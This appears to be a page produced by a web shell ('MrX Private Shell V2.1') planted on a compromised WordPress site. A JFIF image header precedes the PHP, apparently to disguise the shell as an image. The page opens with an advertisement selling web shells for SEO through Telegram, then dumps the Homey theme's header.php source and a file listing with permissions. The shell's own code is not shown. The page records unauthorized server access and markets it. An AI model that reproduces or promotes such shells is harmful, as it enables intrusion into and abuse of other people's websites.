����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
global $homey_local, $homey_prefix, $template;
$homey_local = homey_get_localization();
$homey_prefix = 'homey_';
/**
* @package Homey
* @since Homey 1.0
*/
?><!DOCTYPE html>
<html <?php language_attributes(); ?>>
<head>
<meta charset="<?php bloginfo( 'charset' ); ?>">
<?php if(basename($template) == "dashboard-reservations.php"
|| basename($template) == "dashboard-reservations2.php"
|| basename($template) == "dashboard-reservations-experiences.php"
|| basename($template) == "dashboard-reservations2-experiences.php"
){ ?>
<meta name="robots" content="noindex,nofollow">
<?php } ?>
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" />
<link rel="profile" href="http://gmpg.org/xfn/11">
<link rel="pingback" href="<?php bloginfo( 'pingback_url' ); ?>">
<?php if( homey_get_map_system() == 'mapbox' ) { ?>
<script src='https://api.tiles.mapbox.com/mapbox-gl-js/v1.12.0/mapbox-gl.js'></script>
<link href='https://api.tiles.mapbox.com/mapbox-gl-js/v1.12.0/mapbox-gl.css' rel='stylesheet' />
<?php } ?>
<?php wp_head(); ?>
</head>
<body <?php body_class(); ?>>
<?php wp_body_open();
$header_type = homey_option('header_type');
if( empty($header_type)) {
$header_type = '1';
}
if(homey_is_dashboard()) {
$header_type = '1';
}
if ( ! function_exists( 'elementor_theme_do_location' ) || ! elementor_theme_do_location( 'header' ) ) {
get_template_part( 'template-parts/header/header', $header_type );
}
?>
<div id="section-body">
<?php
if(homey_banner_needed()) {
get_template_part('template-parts/banner/main');
}
?>
<?php
$enable_search = homey_option('enable_search');
$search_position = homey_option('search_position');
$search_pages = homey_option('search_pages');
$search_selected_pages = homey_option('search_selected_pages');
$enable_search_exp = homey_option('enable_search_exp');
$search_position_exp = homey_option('search_position_exp');
$search_pages_exp = homey_option('search_pages_exp');
$search_selected_pages_exp = homey_option('search_selected_pages_exp');
if(isset($_GET['search_position'])) {
$search_position = $_GET['search_position'];
}
if(isset($_GET['search_position_exp'])) {
$search_position_exp = $_GET['search_position_exp'];
}
if( !homey_is_dashboard() ) {
if(homey_search_needed()) {
if (!is_home() && !is_singular('post')) {
if (($enable_search == 'on' || $enable_search == 1) && $search_position == 'under_banner') {
if ( $search_pages == 'only_home' && is_front_page() ) {
get_template_part ('template-parts/search/main-search');
} elseif ($search_pages == 'all_pages' && ! homey_is_experiences_taxonomy() && ! homey_is_experiences_page() && ! homey_check_halfmap_header_search_needed() ) {
get_template_part ('template-parts/search/main-search');
} elseif ($search_pages == 'only_innerpages' && !is_front_page() && ( homey_is_homey_page() || homey_is_listing_page() || homey_is_listing_taxonomy() ) ) {
get_template_part ('template-parts/search/main-search');
} else if( $search_pages == 'specific_pages' && is_page( $search_selected_pages ) ) {
get_template_part ('template-parts/search/main-search');
} else if( $search_pages == 'only_taxonomy_pages' && homey_is_listing_taxonomy() ) {
get_template_part ('template-parts/search/main-search');
}
}// enable_search for property
if (($enable_search_exp == 'on' || $enable_search_exp == 1) && $search_position_exp == 'under_banner' ) {
if ($search_pages_exp == 'only_home' && is_front_page() ) {
get_template_part ('template-parts/search/main-search-exp');
} elseif ($search_pages_exp == 'all_pages' && ! homey_is_listing_taxonomy() && ! homey_is_listing_page() && ! homey_check_halfmap_header_search_needed() ) {
get_template_part ('template-parts/search/main-search-exp');
} elseif ($search_pages_exp == 'only_innerpages' && !is_front_page() && ( homey_is_homey_page() || homey_is_experiences_page() || homey_is_experiences_taxonomy() ) ) {
get_template_part ('template-parts/search/main-search-exp');
} else if( $search_pages_exp == 'specific_pages' && is_page( $search_selected_pages_exp ) ) {
get_template_part ('template-parts/search/mairen-search-exp');
} else if( $search_pages_exp == 'only_taxonomy_pages' && homey_is_experiences_taxonomy() ) {
get_template_part ('template-parts/search/main-search-exp');
}
}// enable_search for property experience
}
} //homey_search_needed
} //homey_is_dashboard
$already_signed_up = isset($_GET["already_signed_up"]) ? $_GET["already_signed_up"] : '';
?>
<div id="has_social_account" style="display: none" data-has-social-account="<?php echo esc_attr($already_signed_up);?>"></div>
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| css | Folder | 0755 |
|
|
| fonts | Folder | 0755 |
|
|
| framework | Folder | 0755 |
|
|
| images | Folder | 0755 |
|
|
| img | Folder | 0755 |
|
|
| inc | Folder | 0755 |
|
|
| js | Folder | 0755 |
|
|
| languages | Folder | 0755 |
|
|
| single-experience | Folder | 0755 |
|
|
| single-listing | Folder | 0755 |
|
|
| single-post | Folder | 0755 |
|
|
| template | Folder | 0755 |
|
|
| template-parts | Folder | 0755 |
|
|
| vc_templates | Folder | 0755 |
|
|
| woocommerce | Folder | 0755 |
|
|
| .DS_Store | File | 6 KB | 0644 |
|
| 404.php | File | 1.23 KB | 0644 |
|
| archive-experience.php | File | 4.34 KB | 0644 |
|
| archive-hm_homey_memberships.php | File | 2.05 KB | 0644 |
|
| archive-listing.php | File | 4.22 KB | 0644 |
|
| archive.php | File | 2.16 KB | 0644 |
|
| author.php | File | 369 B | 0644 |
|
| comments.php | File | 2.85 KB | 0644 |
|
| content-grid.php | File | 1.54 KB | 0644 |
|
| content-list.php | File | 899 B | 0644 |
|
| content-none.php | File | 1.39 KB | 0644 |
|
| content-page.php | File | 968 B | 0644 |
|
| content.php | File | 1.42 KB | 0644 |
|
| custom_periods_auto_renewl_for_next_year.php | File | 10.26 KB | 0644 |
|
| footer.php | File | 2.12 KB | 0644 |
|
| functions.php | File | 86.62 KB | 0644 |
|
| header.php | File | 5.38 KB | 0644 |
|
| index.php | File | 1.92 KB | 0644 |
|
| localization.php | File | 42.9 KB | 0644 |
|
| page.php | File | 2.64 KB | 0644 |
|
| screenshot.png | File | 282.37 KB | 0644 |
|
| search.php | File | 1.92 KB | 0644 |
|
| searchform.php | File | 320 B | 0644 |
|
| sidebar-experience.php | File | 654 B | 0644 |
|
| sidebar-listing.php | File | 640 B | 0644 |
|
| sidebar.php | File | 649 B | 0644 |
|
| single-experience.php | File | 2.21 KB | 0644 |
|
| single-hm_homey_memberships.php | File | 41.63 KB | 0644 |
|
| single-listing.php | File | 3.47 KB | 0644 |
|
| single.php | File | 5.63 KB | 0644 |
|
| style.css | File | 8.02 KB | 0644 |
|
| taxonomy-experience_amenity.php | File | 216 B | 0644 |
|
| taxonomy-experience_area.php | File | 209 B | 0644 |
|
| taxonomy-experience_city.php | File | 209 B | 0644 |
|
| taxonomy-experience_country.php | File | 209 B | 0644 |
|
| taxonomy-experience_facility.php | File | 209 B | 0644 |
|
| taxonomy-experience_language.php | File | 209 B | 0644 |
|
| taxonomy-experience_state.php | File | 209 B | 0644 |
|
| taxonomy-experience_type.php | File | 209 B | 0644 |
|
| taxonomy-listing_amenity.php | File | 215 B | 0644 |
|
| taxonomy-listing_area.php | File | 215 B | 0644 |
|
| taxonomy-listing_city.php | File | 215 B | 0644 |
|
| taxonomy-listing_country.php | File | 215 B | 0644 |
|
| taxonomy-listing_facility.php | File | 215 B | 0644 |
|
| taxonomy-listing_state.php | File | 215 B | 0644 |
|
| taxonomy-listing_type.php | File | 215 B | 0644 |
|
| taxonomy-room_type.php | File | 215 B | 0644 |
|
| wpml-config.xml | File | 15.61 KB | 0644 |
|